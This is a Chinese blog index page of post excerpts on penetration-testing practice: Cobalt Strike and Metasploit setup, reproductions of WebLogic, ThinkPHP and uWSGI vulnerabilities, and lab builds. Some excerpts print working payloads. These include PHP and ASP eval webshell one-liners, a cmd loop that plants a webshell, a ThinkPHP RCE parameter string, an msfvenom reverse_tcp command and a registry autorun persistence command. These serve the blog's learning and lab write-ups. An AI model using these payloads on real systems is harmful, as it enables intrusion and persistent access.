自定义博客皮肤VIP专享

*博客头图:

格式为PNG、JPG,宽度*高度大于1920*100像素,不超过2MB,主视觉建议放在右侧,请参照线上博客头图

请上传大于1920*100像素的图片!

博客底图:

图片格式为PNG、JPG,不超过1MB,可上下左右平铺至整个背景

栏目图:

图片格式为PNG、JPG,图片宽度*高度为300*38像素,不超过0.5MB

主标题颜色:

RGB颜色,例如:#AFAFAF

Hover:

RGB颜色,例如:#AFAFAF

副标题颜色:

RGB颜色,例如:#AFAFAF

自定义博客皮肤

-+
  • 博客(38)
  • 收藏
  • 关注

转载 公网服务器安装msf和CobaltStrike

cs安装:https://blog.csdn.net/qq_40624810/article/details/107572575具体注意java环境的配置,不同的系统配置命令不同。msf安装,我是参考这篇博客的:https://www.aqniu.com/vendor/50662.html因为的vps也是CentOS的,各位安装还是要看好自己的操作系统版本。1. 使用安装脚本安装MSFcurl https://raw.githubusercontent.com/rapid7/metas

2021-04-21 18:05:23 1337 1

原创 Weblogic XMLDecoder(CVE-2017-10271)反序列化漏洞复现

一、原理Weblogic WLS 组件中存在XMLDecoder远程代码执行漏洞,可以构造请求对运行WebLogic中间件的主机进行攻击原理:该漏洞产生于WLS-WebServices这个核心组件中,因为它使用XMLDecoder来解析XML数据,直接构造payload,发送xml数据,即可利用该漏洞,上传webshell等等。二、漏洞版本10.3.6.0.0,12.2.1.1.0,12.2.1.2.0,12.1.3.0.0三、漏洞搭建:判断:通过中间件去判断端口+/wls.

2021-03-11 17:59:04 338

原创 WebGoat靶场搭建

下载地址:https://github.com/WebGoat/WebGoat/releases下载完后在对应目录下启动:java -jar webgoat-server-8.0.0.M14.jar默认监听127.0.0.10:8080地址,如果想修改ip和端口可在启动时指定相应参数,如:java -jar webgoat-server-8.0.0.M14.jar --server.port=8000 --server.address=0.0.0.0默认监听端口8080,待启动完成后

2021-01-12 23:30:03 663

原创 java反序列化字节转字符串工具--SerializationDumper-v1.12

下载地址:https://github.com/NickstaDB/SerializationDumper一段数据如果以aced开头,那么他就是这一段java序列化的16进制用法 :java -jar SerializationDumper-v1.1.jar aced000573720026636e2e656d61792e...

2021-01-12 22:59:46 1416

原创 Beef-xss安装及使用

一、背景BeEF是The Browser Exploitation Framework的缩写。它是一种专注于Web浏览器的渗透测试工具。随着对包括移动客户端在内的客户网络攻击的担忧日益增加,BeEF允许专业渗透测试人员使用客户端攻击媒介来评估目标环境的实际安全状况。与其他安全框架不同,BeEF超越了强化的网络边界和客户端系统,并在一个开放的环境中检查可利用性:Web浏览器。BeEF将挂钩一个或多个Web浏览器,并将它们用作启动定向命令模块以及从浏览器上下文中对系统进一步攻击的滩头阵地。BeEF

2020-12-10 18:24:34 7450 5

原创 Wooyun漏洞库本地搭建

身为男人,怎么能屈服于力量之下一、漏洞库虚拟机下载从github下载:https://github.com/hanc00l二、解压第一个文件三、用VM打开.vmx文件这是一个挂起状态的虚拟机,直接运行即可用户名/密码 : hancool/qwe123这里的IP可能会ping不通主机,这里方式为dhcp,可以重启网卡,或者重启虚拟机都能重新获得ip,保证主机和虚拟机可以ping通就行四、分别进入两个目录执行命令1. cd wooyunscrapy c..

2020-12-01 00:18:37 1736

原创 nessus安装及其使用

一、安装群里有人发了破解版的nessus,只需要打开虚拟机就可以使用。遇到两个问题:1、虚拟机无法打开镜像。2、虚拟机网络问题。二、解决问题1、虚拟机无法打开镜像:主要在配置文件中,修改成你VM对应的版本号参考博客:https://blog.csdn.net/qq_36651243/article/details/918628312、虚拟机网络打开后是无界面的linux系统,所以我们保证物理机和虚拟机在一个网段,在主机中用浏览器打开就好。因为环境已经配置好了。.

2020-11-30 18:37:30 1133

原创 .htacess文件利用,上传webshell

背景:在做墨者靶场一道文件上传的题目遇见的,有一种做法利用php3、php5后缀绕过。还有就是这种利用.htacess文件去上传webshell。参考博客:https://blog.csdn.net/jokerhappy/article/details/107838541SetHandler application/x-httpd-http上述代码写入文件,上传文件抓包将文件名改为..htacess,发送编写一句话木马如下:<?php @eval($_POST['joke

2020-11-10 09:31:10 662

原创 利用shell写入一句话

for %i in (d) do (cd /d %i:\ & (for /r %j in (*050.jpg) do echo ^<%eval request^(chr^(35^)^)%^>>%~dpjK.asp)遍历050.jpg,找到后在同级目录下写入一句话。注意:050.jpg替换为要渗透网站中可以知道目录的图片,密码为chr35 解码后的#然后就可以用菜刀连接...

2020-11-09 08:54:49 300

原创 Thinkphp5-0-X远程代码执行漏洞

参考博客:https://www.cnblogs.com/303donatello/p/12721587.html https://blog.csdn.net/qq_45521281/article/details/105907276其实后面的&test=-1参数没有意义,只要有captcha就行在post里加上我们要提交的参数_method=__construct&filter[]=phpinfo&method=GET提交...

2020-11-09 08:39:29 816

原创 uWSGI 漏洞(CVE-2018-7490)

… 表示上一级目录%2f是url编码的/uWSGI 2.0.17之前版本中存在路径遍历漏洞,该漏洞源于程序没有正确的处理DOCUMENT_ROOT检测。攻击者可通过发送带有‘…’序列的特制URL请求利用该漏洞查看系统上的任意文件。 访问地址存在使用信息,存在uwsgi/php,但是没找到显示版本的地址,就盲试、可以多加几个%2f确保是根目录...

2020-11-09 08:14:54 457

原创 cobalt strike 使用(一)

背景前两天安装好了cs,今天趁着周末试试怎么使用,结果弄了半天没有成功上线过一次靶机。换了个方式结果都行了。赶紧写个博客记录下。一、本地连接在无数次连接不到靶机后,我果断放弃了用公网服务器作为服务端的方式。我用kali同时作为服务端和客户端尝试1.服务端启动服务端,同样的命令只不过ip改成kali内网的ip2.客户端因为是linux下所以不能在cobalstrike目录下用命令启动java -XX:+AggressiveHeap -XX:+UseParallelGC

2020-07-26 14:49:47 651 2

原创 Cobalt Strike安装

背景早就听说cs(Cobalt Strike)大名了,今天尝试安装一下。过程中遇到种种坑,其实大多数都是因为自己的蠢。吃一堑长一智以后长点脑子。一、JAVA环境cs无论是客户端或者服务端都要依赖于java环境,所以我们先要安装java环境。这里我们服务器是基于debain版本的linux,所以我们linux下安装jdk-11.0.8_linux-x64的java环境,因为我记得cs官方文档里好像说过jdk要11.0以上版本。具体安装包可以官网下载。下载好我们上传到服务器开始安装。安装位置在

2020-07-25 01:53:16 1359 6

转载 Sqlmap小技巧

在sqlmap无数次没跑出来数据,不是连接失败、各种error后。我果断放弃了sqlmap用超级注入工具,超级注入工具他不香嘛!直到深入了解了下sqlmap后才发现自己的愚昧无知。就他娘会用个sqlmap -u "" --dbs,能跑出来才怪一、tamper脚本很多站点有waf或者过滤,只要在sqlmap 注入语句后加入小小的一个--tamper +脚本文件,就可以绕过很多waf了。脚本文件sqlmap中有自带的,你也可以网上找加到文件中。二、force--ssl这个参数以前老大..

2020-07-24 00:28:47 1277

原创 利用公钥实现SSH免密登录

一、背景看了B站视频,了解到新姿势。SSH免密登录可以在遇到文件上传漏洞时使用,需要的条件比较多。目标开始了ssh服务,且存在上传漏洞。我们就可以通过上传漏洞实现ssh免密登录。二、原理ssh远程连接我知道的有两种方式。一是通过账号密码,二是通过公私钥。我们产生一对密钥对,分为公钥和私钥。将公钥上传到要登录的服务器,然后通过私钥远程连接服务器就可以实现免密登录了。三、实现1、账号密码登录首先我们看看常规的账户密码形式的远程登录。我们就可以登录到服务器了,可是在渗透过程显然无法

2020-07-14 19:28:12 1493

转载 漏洞扫描工具nikto

https://blog.csdn.net/smli_ng/article/details/105994754?utm_medium=distribute.pc_relevant_t0.none-task-blog-BlogCommendFromMachineLearnPai2-1.nonecase&depth_1-utm_source=distribute.pc_relevant_t0.none-task-blog-BlogCommendFromMachineLearnPai2-1.nonecas

2020-07-14 09:35:19 321

原创 文件上传漏洞利用

一、背景B站看了个up靶机练习的视频,学习到新东西写下来。如有侵权,联系马上删除!视频:https://www.bilibili.com/video/BV1Tg4y1B7TT(up主才12岁,真是自愧不如!)二、原理找到一处上传点,上传shell,利用msfvenom生成。msfvenom -p php/meterpreter/revese_tcp LHOST=192.168.3.171 LPORT=4444 -f raw > shell.php本来上传后,利用msfcon

2020-07-14 01:08:15 400

原创 Windows server 2012 云服务器利用iis搭建网站

背景前几天把原本linux的云服务器重装成win server 2012,用rdp远程连接。后来看了好多渗透教程都是自己在云服务器上搭建web,所以想试试用iis搭建个本地网站。以前弄过已经忘了,这次写个博客以后再想起来就可以看看。话不多说,进入主题。一、安装iis现在服务器仪表盘,管理->添加角色和功能在安装过程一直下一步,直到服务器角色 选中web服务器,然后一直下一步直到安装。安装后就可以在工具 选中IIS管理服务器,进入管理界面。二、网站搭建把原来的网站

2020-07-13 21:47:22 1399

转载 中国蚁剑

听老大说菜刀不咋好,让我换个中国蚁剑https://www.fujieace.com/hacker/tools/antsword.html

2020-07-07 22:28:17 1282

转载 一句话获取电脑已经登录的qq

原理:windows管道技术powershell : [System.Text.RegularExpressions.Regex]::Matches([System.IO.Directory]::GetFiles("\\.\\pipe\\"),"QQ_(\d*)_pipe").Groups;cmd : dir \\.\pipe\\ | findstr "QQ_" | findstr "_pipe"

2020-07-07 21:53:51 565

原创 Mimikatz 学习ing.....

背景今天老大问我拿到内网一台机器,怎么知道用户密码。我自然不会,老大就让我了解Mimikatz这个工具。于是学习到这个直接读取远程服务器的密码的工具mimikatzMimikatzmimikatz是法国人Gentil Kiwi编写的一款windows平台下的神器,这是我除了zywoo知道的第二个法国人了。它具备很多功能,其中最亮的功能是直接从lsass.exe 进程里获取windows处于active状态账号的明文密码。mimikatz的功能不仅如此,它还可以提升进程权限,注入进程,读取进程内存

2020-07-07 21:28:43 454

原创 frp内网渗透工具

背景在老大带领下拿到shell,内网环境。了解可以通过端口转发工具实现内网端口转发到公网。本来打算了解lcx工具,可老大说这工具太老了所以用frp。下载这里工具用到GitHub大佬fatedier:https://github.com/fatedier/frp/releases服务器客户端环境配置服务器:服务器我用的是腾讯云的linux操作系统,所以将下载的frp_linux上传到服务器。设置映射端口:编辑frps.ini:这里的7000端口是用来和客户端连接的

2020-07-06 23:12:56 658

原创 远程桌面连接CredSSP加密Orcle修复

远程桌面连接CredSSP加密Orcle修复在学习渗透测试内网转发,愣是远程桌面连不上。一直是远程远程桌面 CredSSP加密 Oracle修正_之类的错误。查了一堆百度资料,都不行最终找到了一条正确的解决方法。解决方法对于windows 10家庭版的最终解决方案在这里,修改注册表可以完美解决,具体操作如下,windows+R打开运行 输入regedit打开注册表,依次打开路径计算机\HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Wind...

2020-07-06 20:32:30 303

原创 html里执行php代码

最近在自学PHP,发现在html中插入php代码会被自动注释不运行,百度发现说需要配置什么一句话到httped.conf里面。突然想到,如果把html文件后缀名改为php会不会运行呢?结果当然是可以运行,因为.php为后缀,浏览器会按照php文件去解析自然能识别php代码 故能运行那会不会相反的HTML代码不会被运行呢?答案html代码依然会被浏览器成功解析。...

2019-11-10 14:29:50 1259

原创 CVE-2019-0708漏洞复现(EXP利用)

一、准备从github下载这个漏洞并导入到msf中,具体方法可以参考下面链接:https://blog.csdn.net/qq_39783851/article/details/101024082注意:我第一次失败是因为源的问题,我将源换成阿里源后更新成功了二、攻击可以参考这个教程:https://www.kwok.fun/index.php/2019/09/13/%E5%...

2019-09-20 22:31:23 720

转载 i春秋渗透测试入门——真的很简单

做了道i春秋上的渗透测试题目,效果不是很好。找到别人的解题思路。从中学习,在此附上链接:https://bbs.ichunqiu.com/thread-35338-1-1.html一句话木马:<?php @eval($_POST['pass']);?>cacls:https://www.cnblogs.com/crid/archive/2010/11/28/51727...

2019-09-18 18:28:38 2154

原创 Bad usb实现U盘攻击

1、Bad usb介绍及原理介绍BadUSB是利用伪造HID设备执行攻击载荷的一种攻击方式。用户插入BadUSB,就会自动执行预置在固件中的恶意代码,如下载服务器上的恶意文件,执行恶意操作等。由于恶意代码内置于设备初始化固件中,而不是通过autorun.inf等媒体自动播放文件进行控制,因此无法通过禁用媒体自动播放进行防御,杀毒软件更是无法检测设备固件中的恶意代码。这种攻击方式可以在不经意...

2019-09-18 14:34:26 7164

原创 用阿里云服务器搭建自己的网站

基本和这个差不多:https://blog.csdn.net/Ares_song/article/details/79194065视频教程是参考:https://www.bilibili.com/video/av15159168

2019-08-20 17:38:16 193

原创 利用微软编号为ms12-020的漏洞,实施dos攻击,造成目标停止服务

微软的Windows操作系统提供了远程桌面协议,这是一个多通道的协议,用户可以利用这个协议连上提供微软终端机服务的计算机。但是微软提供的这个服务被发现存在一个编号为ms12-020的漏洞,Windows在处理某些RDP报文Terminal Server存在错误,可被利用造成服务停止响应。默认情况下,任何windows操作系统都未启用远程桌面协议(RDP)。没有启用RDP的系统不受威胁。...

2019-08-17 15:37:16 770

原创 注册表设置开机自启项

reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v winrar /t reg_sz /d "C:\Users\HOME\Desktop\k.exe" /f在注册表设置C:\Users\HOME\Desktop\k.exe为开启自启项目,可以在任务管理器中的启动里禁用,也可以在注册表里找到...

2019-08-07 19:58:13 2126

原创 Veil生成免杀payload 渗透win10 获取靶机shell

一:实验环境两台机器处于同网段攻击机:kali 192.168.115.134靶机:win10 192.168.115.1二:Veil下载、安装、使用kali里默认没有安装Veil,我们通过命令行安装: apt-get update && apt-get install veil安装过程有点漫长,如果用的国内源可能会快点。安装完成后启动Veil...

2019-08-04 15:07:48 1839 9

原创 利用ms17-010 远程执行漏洞渗透Win7,并留下后门

一、环境准备主机 kali :192.168.115.134靶机win7x64:192.168.115.133二、渗透Metasploit 指令学习:https://blog.csdn.net/tan6600/article/details/46845793这里利用的是win7的ms17-010 远程执行漏洞先使用auxiliary/scanner/smb/smb_ms17...

2019-07-18 23:10:54 4363 2

原创 FTP实现文件传输

今天尝试Windows10主机和VM虚拟机里的Windows10进行通过FTP连接传输文件一、开始一定要关掉主机的防火墙,否则FTP连接会被防火墙拦截,虚拟机的防火墙关不关闭没有影响。开启FTP服务,进入控制面板->程序,开启如图所示服务进入防火墙允许的应用开启FTP服务,如果没有FTP服务则直接下一步进入管理工具打开Internet information Se...

2019-07-18 00:35:54 6307

原创 PyQt5安装与Pycharm配置

PyQt5安装。我的环境是Windows10, python3.6.8。1、安装python时,一定要安装pip2、安装后,打开cmd窗口,进入python安装目录下,我的是E:\python3.6.8\Scripts安装SIP、pyqt5(需要SIP的支持,所以先安装SIP,再安装pyqt5)pip install sippip install pip install ...

2019-04-29 09:59:54 263

转载 DHCP的攻击和防御

转https://cloud.tencent.com/developer/article/1197597

2018-12-15 00:09:17 3774

原创 桔梗浏览器劫持

被一个叫桔梗的浏览器劫持恶心到了,在这里说下解决方法,还是查了一堆资料才解决的。右击浏览器打开属性,我这里是goole,注意在常规属性里的只读 别选勾,不然没法操作。在快捷方式右击打开属性,在目标里 从这后面全删除http://确定就好了...

2018-06-10 23:42:06 9185

原创 BugkuCTF多种方法解决

链接下载压缩包,解压后得到一个zip压缩包,解压后是个exe文件,无法打开。放入winhex下分析,右边是一串类似base64编码的字符串。题目说在做题过程中会得到一个二维码图片,百度了下图片和base64可以转化。用在线工具转化可以得到一个二维码扫描就是flag.注意在用转化工具的时候要追加img标签。...

2018-06-09 17:03:49 4225

转载 Bugku杂项隐写2

打开是这张图片,放入liunx下的binwalk分析图片中有个zip压缩包用kali里的foremost提取压缩包,会提取出三个文件,其中flag.rar与提示.jpg是CD24.zip压缩包的内容。通过提示得到密码和KQJ三个字母有关通过ARCHRP软件进行暴力破解获得密码为871,解压获得一张图片在winhex下打开发现f1@g{eTB1IEFyZSBhIGhAY2tlci...

2018-06-02 22:59:08 1782

空空如也

空空如也

TA创建的收藏夹 TA关注的收藏夹

TA关注的人

提示
确定要删除当前文章?
取消 删除